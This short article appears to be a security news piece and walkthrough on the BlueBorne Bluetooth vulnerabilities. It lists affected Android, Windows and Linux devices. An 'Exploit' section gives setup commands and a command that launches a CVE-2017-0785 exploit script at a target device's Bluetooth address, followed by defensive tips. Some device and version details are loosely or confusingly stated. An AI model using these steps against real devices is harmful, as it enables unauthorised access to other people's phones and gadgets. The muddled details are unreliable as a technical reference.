Before a week security experts from Armis Labs revealed a new attack BlueBorne that affects Nearly All Connected Device. Simply to say if you are having Bluetooth enabled devices then you are vulnerable to BlueBorne attack.
Affected Devices – BlueBorne
All Android Devices Phones, tablets, wearables are affected, some of the example devices.
- Google Pixel
- Samsung Galaxy
- Samsung Galaxy Tab
- LG Watch Sport
- Pumpkin Car Audio System
All the windows version Since Windows Vista are infected and Microsoft issued a patch for it on July 11, 2017.
All Linux running BlueZ are affected with information Leakage and version 3.3-rc1 with remote code Execution. Example devices
- Samsung Gear S3 (Smartwatch)
- Samsung Smart TVs
- Samsung Family Hub (Smart refrigerator)
Exploit – BlueBorne
We should have Prerequisites installed Package: libbluetooth-dev to use BlueZ Linux Bluetooth stack.
sudo apt-get install bluetooth libbluetooth-dev
sudo pip install pybluez
sudo pip install pwntools
You can use Blueborne Android Scanner to scan for blueborne-vulnerable Android devices. Once you have found the device and have prerequisites installed you can launch the attack by typing following command.
python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX
Before Performing this Test, make sure Bluetooth has Turned On and visible with your Target Device.
- Disable Bluetooth as soon as you complete the process, turn it on only when it is required.
- Now Android users can check their devices and device around them for vulnerability with the app BlueBorne Detector.